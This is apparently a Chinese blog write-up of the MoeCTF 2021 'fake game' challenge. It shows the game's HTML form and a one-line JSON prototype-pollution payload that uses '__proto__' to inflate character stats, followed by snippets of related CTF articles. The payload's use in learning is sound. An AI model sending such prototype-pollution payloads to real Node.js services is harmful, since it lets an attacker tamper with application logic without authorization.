【MoeCTF 2021】fake game

于 2025-04-01 09:04:27 发布
阅读量110 收藏
点赞数 2
CC 4.0 BY-SA版权
文章标签: 网络安全 NSSCTF MoeCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LDdfq/article/details/146775792

原型链污染题目

题目

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>index</title>
    <style>
        .myForm {

        }
    </style>
    <script src="/static/jquery.min.js"></script>
</head>
<body>
<div>你有十点属性值可以用来分配,合理分配属性去挑战魔王吧!!!</div>
<!--如果你将某一项属性值设为0,你将没有这项属性-->
<form class="myForm">
    <div>
        <label for="health">生命值:</label>
        <input id="health" type="text">
    </div>
    <div>
        <label for="attack">攻击力:</label>
        <input id="attack" type="text">
    </div>
    <div>
        <label for="armor">护甲:</label>
        <input id="armor" type="text">
    </div>
    <button type="button" id="submit">创建角色</button>
</form>
<script type="text/javascript">
    $(function () {
        $("#submit").on('click', function () {
            $.ajax({
                type: "POST",
                url: "/api/fight",
                contentType: "application/json; charset=utf-8",
                dataType: 'json',
                data: JSON.stringify({
                    attributes: {
                        health: parseInt($("#health").val()),
                        attack: parseInt($("#attack").val()),
                        armor: parseInt($("#armor").val()),
                    }
                }),
                success: function (res) {
                    if (res.status === 200) {
                        alert(res.result);
                    } else if(res.status === 403){
                        alert("Invalid input, please try again");
                    } else if(res.status === 500){
                        alert("Json data only!");
                    }
                },
            })
        })
    });
</script>
</body>
</html>

思路

拓宽一下视野,一道原型链污染

参考文章:csdn - 安全中心

EXP

{"attributes":{"health":0,"attack":0,"armor":0,"__proto__":{"health":50000,"attack":50000,"armor":50000}}}

XiaoHei_Q
关注
AttributeError: module ‘torch.library‘ has no attribute ‘register_fake‘解决方案
weixin_43178406的博客
10-30 13万+
本文主要介绍了AttributeError: module ‘torch.library’ has no attribute 'register_fake’解决方案,希望能对使用Python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
Moectf2021web题解
qq_45845771的博客
09-27 1692
[toc] eeeeeeeeeeezunserialize 知识点: pop链的构造:主要看这篇文章https://paper.seebug.org/1480/ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7fWdPkQI-1632746009325)(C:\Users\yuan\AppData\Roaming\Typora\typora-user-images\image-20210906180953364.png)] POC <?php class entra
[MoeCTF 2021]——Web方向 wp
Leaf_initial的博客
08-09 2477
这里注意必须是0才可以,因为只有一个f1Ag的值往进传,所以前后必须是一样的,如果为其他数字的话需要俩个变量往进传。中的值代入进去,然后找到他的所属类,然后找到FLAG中的全局变量flag。__get() :获得一个类的不可访问或者不存在的成员变量时调用。__call():在对象上下文中调用不可访问的方法时触发。这里不多阐述原型链污染的概念了,可以去看p神的文章。提示我们可以有十点属性来分配,分配肯定是打不过的。游戏题,要求我们打到5w分,基本上是达不到的。在源码中找到控制分数的属性,
NSSCTF web刷题记录4
rev1ve的博客
11-06 532
大体流程就是先获取所有的GET和POST请求,然后一次性发送,观察是否存在可利用的shell,如果成功再先判断所有的GET里是否存在,然后判断POST里是否存在shell,通过flag参数值判断为哪个方式,最后输出可利用的shell文件。分析一下,main函数首先检测参数是否小于2,然后创建了一个http.FileServer,并传入fs.CreateFileServFS()函数的返回值作为参数,能够访问文件。我们输入1,1看看,发现有hint是随机数,并且我们修改code的值,随机数固定不变。
【Web】NodeJs相关例题wp
uuzeray的博客
11-21 561
浏览器内部使用32位带符号的整数来储存推迟执行的时间这意味着setTimeout最多延迟2147483647ms。只要大于2147483647,就会发生溢出,就可以绕过那个时间限制,进入下一个路由。根据读到的package包引用,发现lodash版本为4.17.16。我们传入一个delay和原先定义的60000进行比较。大的值复制给delay。简单审一下,污染system_open为yes就可以拿flag。但是我们的代码不能超时6秒。表单提交个D0g3_Yes!给到版本号,敏感的weber已经有想法了(
【西电Moectf2023-Jail-WP】
qq_33295410的博客
09-27 3388
它支持在源码行间设置(有条件的)断点和单步执行,检视堆栈帧,列出源码列表,以及在任何堆栈帧的上下文中运行任意 Python 代码。当各位玩家连接后 可以看到一个类似于菜单的东西.输入g(G)会获得挑战的源码,输入e(E)会进入挑战,输入c(C)会得到挑战的描述[题目里的会更加详细],输入q(Q)会退出。设置了两个功能,一个是漏洞利用,可以使用python下面函数查看环境变量,找到真正的key,再利用backdoor来getshell。手动在终端输入是不行的,需要使用脚本提交,贴上代码。
CTF专项训练之HTTP协议
Zx244349115的博客
11-24 1124
题目描述:HTTP的专项训练
NSSCTF逆向刷题记录
fivesheeptree的博客
07-18 2390
得到第一位字符"N"以及flag的长度为35arr数组的长度只有34,故将i的范围改为34s = ['N']
云曦网络空间安全研究室2024级寒假作业
2301_80652627的博客
01-17 1173
这行代码使用eval()函数将变量$args的值作为PHP代码执行,也就是通过var_dump()函数将$args变量的值输出。preg_match("/^\w+/",/",/",args)){}:这个条件判断语句使用正则表达式检查$args变量的值是否符合\w+5、if(isset($_GET[‘args’])){}这个条件判断语句检查是否存在名为"args"的GET参数。:这是一个关联数组,包含了所有的全局变量。:是一个旧的、不安全的数组,包含了所有的cookie数据,不推荐使用。
CTF-反序列化(持续更新)
m0_74317362的博客
07-27 1717
魔术方法__construct() 当一个对象创建时自动调用__destruct() 当对象被销毁时自动调用 (php绝大多数情况下会自动调用销毁对象)__sleep() 使**用serialize()函数时触发__wakeup 使用unserialse()**函数时会自动调用__toString 当一个对象被当作一个字符串被调用。__call() 在对象上下文中调用不可访问的方法时触发__callStatic() 在静态上下文中调用不可访问的方法时触发。
FAKE GAME-开源
04-27
"FAKE GAME-开源"是一款基于自然演化策略的数据挖掘工具,其主要特点是通过模拟生物进化的过程来优化和演化数据挖掘模型。开源软件的特性使得它能够免费获取,并且允许用户查看、修改和分发源代码,这对于开发者和...
json fake_useragent fake_useragent
06-24
fake_useragent json缓存 爬虫 fake 消息头
deepfake视频检测-基于卷积Vision-Transformer实现的deepfake视频检测源码+模型+运行说明.zip
10-13
Deepfake视频的出现严重威胁了信息的真实性和个人的声誉,因此开发出有效的Deepfake视频检测工具成为了当前技术研究的重点之一。 本文将介绍的项目是一个基于卷积Vision-Transformer技术的Deepfake视频检测工具。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8732
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
js-时事通讯-设计完美HTML时事通讯的9个技巧.docx
06-30
js-时事通讯-设计完美HTML时事通讯的9个技巧.docx
AnyBackup-SQLServer应用容灾最佳实践.docx
06-30
AnyBackup-SQLServer应用容灾最佳实践.docx
发展大数据-扩大影响力.docx
06-30
发展大数据-扩大影响力.docx
我国智慧城市发展现状及未来趋势探索.docx
06-30
我国智慧城市发展现状及未来趋势探索.docx
Maven配置阿里云镜像仓库操作指南
最新发布
06-30
资源下载链接为: https://pan.quark.cn/s/9e7ef05254f8 以下几种表述供你参考: 为 Maven 设置阿里云镜像仓库。 配置 Maven 使用阿里云镜像仓库。 将 Maven 配置为使用阿里云镜像仓库。 Maven 配置阿里云镜像仓库教程。 Maven 如何配置阿里云镜像仓库。 Maven 配置阿里云镜像仓库指南。 Maven 配置阿里云镜像仓库的方法。 Maven 配置阿里云镜像仓库的步骤。 Maven 配置阿里云镜像仓库的流程。 Maven 配置阿里云镜像仓库的操作。 Maven 配置阿里云镜像仓库的详细步骤。 Maven 配置阿里云镜像仓库的具体方法。 Maven 配置阿里云镜像仓库的完整流程。 Maven 配置阿里云镜像仓库的详细教程。 Maven 配置阿里云镜像仓库的完整指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值